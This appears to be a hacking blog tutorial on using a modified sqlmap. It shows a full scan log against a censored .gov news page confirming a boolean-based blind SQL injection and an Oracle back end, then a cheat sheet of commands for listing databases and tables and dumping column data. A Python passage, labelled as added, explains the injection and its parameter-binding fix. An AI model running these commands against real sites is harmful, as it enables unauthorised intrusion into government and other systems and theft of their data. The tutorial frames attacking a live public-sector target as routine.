
Hacking with SQLMAP



Things you need
- The SQLMap tool: Download.zip or Download.rar
- A server or PC with Python installed
- A target that has an SQL injection vulnerability

Advantages of SQLMap:

1. It performs SQL injection using several methods
- Boolean-Based Blind SQL Injection
- Time-Based Blind SQL Injection
- Error-Based SQL Injection
- UNION Query SQL Injection
- Stacked Query SQL Injection

2. It works well with several types of database, such as:
- MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase & SAP MaxDB

We will try to carry out “Database Fingerprinting & SQL Weaknesses” on a target website.


# Target [URL]: http://<<sensor>>.gov/news/index.php?newsid=187
D:\binushacker\injection>sqlmap.py -u http://<<sensor>>.gov/news/index.php?newsid=187 -f
sqlmap/0.10 modified by BinusHacker Team - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
Added new feature by BinusHacker Team:
- Speed acceleration
- Request limitation
- Queries management
[*] starting at: 13:43:24
[13:43:25] [INFO] using 'D:\binushacker\injection\output\<<sensor>>.gov\session' as session file
[13:43:25] [INFO] testing connection to the target url
[13:43:26] [INFO] testing if the url is stable, wait a few seconds
[13:43:28] [INFO] url is stable
[13:43:28] [INFO] testing if GET parameter 'newsid' is dynamic
[13:43:28] [INFO] confirming that GET parameter 'newsid' is dynamic
[13:43:29] [INFO] GET parameter 'newsid' is dynamic
[13:43:30] [WARNING] heuristic test shows that GET parameter 'newsid' might not be injectable
[13:43:30] [INFO] testing sql injection on GET parameter 'newsid'
[13:43:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:43:33] [INFO] GET parameter 'newsid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:43:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:43:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:43:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:43:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:43:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:43:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:43:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:43:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:43:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:43:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:43:39] [INFO] testing 'Oracle AND time-based blind'
[13:43:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:43:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:43:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
GET parameter 'newsid' is vulnerable. Do you want to keep testing the others? [y/N]
n
sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: GET
Parameter: newsid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsid=187 AND 309=309
---
[13:44:14] [INFO] testing MySQL
[13:44:16] [WARNING] the back-end DBMS is not MySQL
[13:44:16] [INFO] testing Oracle
[13:44:20] [INFO] confirming Oracle
[13:44:23] [INFO] the back-end DBMS is Oracle
[13:44:23] [INFO] actively fingerprinting Oracle
web server operating system: Linux Debian or Ubuntu 4.0 (etch)
web application technology: Apache 2.2.3, PHP 4.4.4
back-end DBMS: active fingerprint: Oracle 10g
[13:44:26] [INFO] Fetched data logged to text files under 'D:\binushacker\injection\output\<<sensor>>.gov'
[*] shutting down at: 13:44:26



So, from that output we can see that the “.gov” target has a “boolean-based blind SQL injection” weakness.
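Why the log above reports 'newsid' as boolean-based blind injectable, and what removes the finding, shown as an added example that is not code from the original post. SQLite stands in for the Oracle back end, and the news table, its sample row and all function names are assumptions made for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the Oracle back end in the log.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (newsid INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (187, 'Constructed sample article')")
    return db

def fetch_vulnerable(db, newsid):
    # The request value is pasted into the SQL text, so a trailing
    # "AND 309=309" becomes part of the WHERE clause.
    sql = "SELECT title FROM news WHERE newsid = " + newsid
    return db.execute(sql).fetchall()

def fetch_hardened(db, newsid):
    # Check the expected type first, then bind the value as a parameter:
    # the statement text stays the same whatever the request contains.
    if not re.fullmatch(r"[0-9]{1,9}", newsid):
        return []
    sql = "SELECT title FROM news WHERE newsid = ?"
    return db.execute(sql, (int(newsid),)).fetchall()

def has_boolean_oracle(fetch, db):
    # A page that differs between an always-true and an always-false
    # condition is what the scanner reports as "boolean-based blind".
    true_page = fetch(db, "187 AND 309=309")   # payload shown in the log
    false_page = fetch(db, "187 AND 309=310")  # its always-false counterpart
    return true_page != false_page

if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler exposes the oracle:",
          has_boolean_oracle(fetch_vulnerable, db))
    print("hardened handler exposes the oracle:",
          has_boolean_oracle(fetch_hardened, db))
```

Run against the hardened handler, both conditions produce the same empty page, so the scanner has no true/false difference to measure.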
Next, <<Censored, you know!>>
Here are some important SQLMAP commands
To scan the Target [URL]
./sqlmap.py -u [url]
To get database information from the Target [URL]
./sqlmap.py -u [url] --dbs
To get information about the tables in a database on the Target [URL]
./sqlmap.py -u [url] --tables -D [database]
To get information about the columns in a table in the Target [URL] database
./sqlmap.py -u [url] --columns -T [table name] -D [databasename]
To dump the columns, tables and database of the Target [URL]
./sqlmap.py -u [url] --dump --columns -T [table name] -D [databasename]
To dump specific columns of the Target [URL]
./sqlmap.py -u [url] --dump -C [column name] -T [table name] -D [database name]



The full tutorial is in the following video:
